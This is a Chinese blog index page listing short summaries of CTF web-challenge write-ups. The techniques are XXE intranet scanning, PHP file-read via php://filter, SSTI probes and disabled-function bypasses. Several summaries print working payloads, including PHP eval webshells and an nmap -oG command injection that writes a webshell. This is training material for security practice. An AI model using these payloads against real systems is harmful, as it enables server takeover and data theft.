返回顶部
摘要: 题目给了一个登录界面: 尝试用Burp抓包 题目提示很明显XML注入 本题经过大量尝试,是查看hosts文件从而攻击内网 首先读取文件,得到内网IP段 然后访问该ip 发现没有结果,那么对内网ip进行扫描爆破 最后在ip=12的时候发现flag 阅读全文
posted @ 2020-09-15 10:40 星火不辍 阅读(772) 评论(0) 推荐(0) 编辑
摘要: 首先通过扫描发现index.php.swp备份文件 打开得到代码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^ 阅读全文
posted @ 2020-09-11 11:22 星火不辍 阅读(340) 评论(0) 推荐(0) 编辑
摘要: 题目给了一个网站的模板 通过扫描进入后台admin.php 默认用户名admin 默认密码搜索得shopxo 在当前主题那里下载默认主题 然后在主题里面传一个一句话木马 <?php @eval($_POST[a]); phpinfo(); ?> 用菜刀连接(路径可在浏览器查看源码中找到) 打开fla 阅读全文
posted @ 2020-09-10 20:56 星火不辍 阅读(262) 评论(0) 推荐(0) 编辑
摘要: 扫描目录 看到 robots.txt 访问 在响应头里面找到了提示信息 查看 源代码如下: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //le 阅读全文
posted @ 2020-09-10 15:29 星火不辍 阅读(178) 评论(0) 推荐(0) 编辑
摘要: 首先利用PHP伪协议读取index.php源代码 payload如下: php://filter/read=convert.base64-encode/resource=index 结果如图所示 源代码如下 <?php $file = $_GET['category']; if(isset($fil 阅读全文
posted @ 2020-09-06 22:28 星火不辍 阅读(477) 评论(0) 推荐(0) 编辑
摘要: {{2*2}}[[3*3]] {{3*3}} {{3*'3'}} <%= 3 * 3 %> ${6*6} ${{3*3}} @(6+5) #{3*3} #{ 3 * 3 } {{dump(app)}} {{app.request.server.all|join(',')}} {{config.ite 阅读全文
posted @ 2020-09-04 19:38 星火不辍 阅读(505) 评论(0) 推荐(0) 编辑
摘要: Nmap -oG 可以写入文件 因此我们可以写入一句话木马 payload如下 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 结果回显hacker php被过滤 因此考虑用短标签绕过 ' <?= @eval($_POST["pd"]);?> -oG 阅读全文
posted @ 2020-09-04 16:15 星火不辍 阅读(749) 评论(0) 推荐(0) 编辑
摘要: 抓包看一下 date是一个函数 后面是他的参数 由此形式我们猜测使用了 call_user_func()函数 于是我们尝试读取源代码 查看源代码 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open 阅读全文
posted @ 2020-08-31 11:23 星火不辍 阅读(1018) 评论(0) 推荐(0) 编辑
摘要: 搬运一个师傅的内网渗透教程 https://mp.weixin.qq.com/s/Mk5P_04SAitUjRztc9e-Rw 阅读全文
posted @ 2020-06-24 08:45 星火不辍 阅读(150) 评论(0) 推荐(0) 编辑
摘要: 源代码如下 package main import ( "fmt" "io/ioutil" "log" "net/http" "net/url" "strings" ) var ( secret = "xiaomo.wabzsy" banner = "Golang HTTP Server (v2.3 阅读全文
posted @ 2020-06-21 09:42 星火不辍 阅读(379) 评论(0) 推荐(0) 编辑